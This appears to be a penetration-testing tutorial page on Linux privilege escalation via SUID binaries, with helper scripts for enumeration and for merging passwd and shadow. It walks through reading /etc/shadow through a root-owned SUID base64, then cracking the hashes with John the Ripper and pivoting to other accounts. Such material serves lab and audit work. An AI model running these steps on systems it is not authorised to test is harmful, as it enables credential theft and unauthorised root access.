# SUID

### General method to find files with SUID bit

```bash
$ find / -perm -u=s -type f 2>/dev/null
```

The SUID bit only helps if the file is owned by root (or another privileged account) and the filesystem is not mounted `nosuid`, so check the owner with `ls -l` first. For any root-owned binary that is not part of the stock base system, or a stock one that normally has no business being SUID, look it up at <https://gtfobins.github.io/>: its SUID section lists, per binary, the command that turns the bit into an arbitrary file read, file write, or a shell.
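A worked version of the enumeration step, added here and not part of the original page: it runs the same `find` (with `-perm -4000`, the numeric form of `-perm -u=s`), records the owner, and tags each hit according to a short list of names assumed to have a SUID entry on GTFOBins. That list is a hand-picked subset chosen for this example, not the full GTFOBins index, and the `find -printf` format relies on GNU find.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): enumerate SUID binaries under a
# directory and flag the ones worth checking on GTFOBins first.

# Names assumed (for this example) to have a SUID entry on https://gtfobins.github.io/
GTFO_SUID_NAMES="base64 bash cp env find python3 vim"

# find_suid DIR: print "mode owner path" for every SUID regular file below DIR.
# -perm -4000 is the numeric form of -perm -u=s; unreadable directories are ignored.
find_suid() {
    find "$1" -perm -4000 -type f -printf '%m %u %p\n' 2>/dev/null | sort -k3
}

# is_gtfobin NAME: exit 0 if NAME is in the assumed list above.
is_gtfobin() {
    local name
    for name in $GTFO_SUID_NAMES; do
        [ "$name" = "$1" ] && return 0
    done
    return 1
}

# triage_suid DIR: one tab-separated line per SUID file, tagged:
#   GTFO  root-owned and in the assumed list (direct escalation candidate)
#   root  root-owned but not in the list (inspect by hand: strings, ltrace, source)
#   user  setuid to a non-root account (escalation to that user, not to root)
triage_suid() {
    local mode owner path base tag
    find_suid "$1" | while read -r mode owner path; do
        base=$(basename "$path")
        if [ "$owner" = root ] && is_gtfobin "$base"; then
            tag=GTFO
        elif [ "$owner" = root ]; then
            tag=root
        else
            tag=user
        fi
        printf '%s\t%s\t%s\t%s\n' "$tag" "$mode" "$owner" "$path"
    done
}

# On a live target: triage_suid /
```

Read the `root` lines as carefully as the `GTFO` ones: a custom root-owned SUID binary that nobody has catalogued is often the easier target, since it was written by the system's administrators rather than by coreutils maintainers.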

### Example

Suppose `/usr/bin/base64` is found with the SUID bit set and is owned by root. Because a SUID binary runs with its owner's effective UID, `base64` opens `/etc/shadow` as root, so the file's contents (normally readable only by root) can be encoded, decoded again, and saved:

```bash
$ base64 /etc/shadow | base64 -d > shadow.txt
$ cat /etc/passwd > passwd.txt
```

The `unshadow` utility that ships with John the Ripper merges `shadow.txt` and `passwd.txt` into a single file in the format John expects: each line is the `passwd` entry with the `x` in the password field replaced by the hash from `shadow`.

```bash
$ unshadow passwd.txt shadow.txt > password.txt
$ john --wordlist=[wordlist] password.txt
...
$ john --show password.txt
```

If the wordlist hits, the cracked credentials may belong to a user with more privileges than the current one, and `su` (or SSH) into that account is the next step. From there, escalation continues the same way: that user may own or be able to run further SUID binaries, or hold `sudo` rights on specific binaries (`sudo -l`) that GTFOBins lists as abusable for a root shell.
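To make the file format concrete, the following is an added example (not from the original page, and not John's own code) that reproduces what `unshadow` does with `awk`, and then drops the lines John cannot use. Both input files are constructed samples and the hash strings are placeholders, not real crypt hashes.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): rebuild the unshadow merge so the
# format handed to John is clear, then filter out entries that cannot be cracked.

# merge_shadow PASSWD SHADOW: for each passwd line, replace the "x" password
# field with the hash of the matching shadow entry (joined on the user name).
# Accounts with no shadow entry keep their original field.
merge_shadow() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file (shadow): name -> hash
        ($1 in hash) { $2 = hash[$1] }      # second file (passwd): substitute
        { print }
    ' "$2" "$1"
}

# crackable_lines FILE: keep only entries with a real hash. An empty field has
# no password, "*" means no login, and a leading "!" means the account is locked
# (even when a hash follows), so none of those are worth John's time.
crackable_lines() {
    awk -F: '$2 != "" && $2 !~ /^[!*]/ { print }' "$1"
}

# demo: constructed passwd/shadow pair, merged and filtered. Hashes are placeholders.
demo() {
    local d
    d=$(mktemp -d)
    cat > "$d/passwd.txt" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
EOF
    cat > "$d/shadow.txt" <<'EOF'
root:$6$SALT$ROOTHASHPLACEHOLDER:19000:0:99999:7:::
alice:$6$SALT$ALICEHASHPLACEHOLDER:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
EOF
    merge_shadow "$d/passwd.txt" "$d/shadow.txt" > "$d/password.txt"
    crackable_lines "$d/password.txt"    # prints the root and alice lines only
    rm -rf "$d"
}

# Then, on the real merged file: john --wordlist=/path/to/wordlist password.txt
```

The merge is why both files are needed: `shadow` holds the hash, but `passwd` holds the UID, GECOS and shell that John uses for its reporting and for the `--show` output. Filtering locked and `*` accounts before cracking keeps the run focused on accounts that can actually be logged into.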
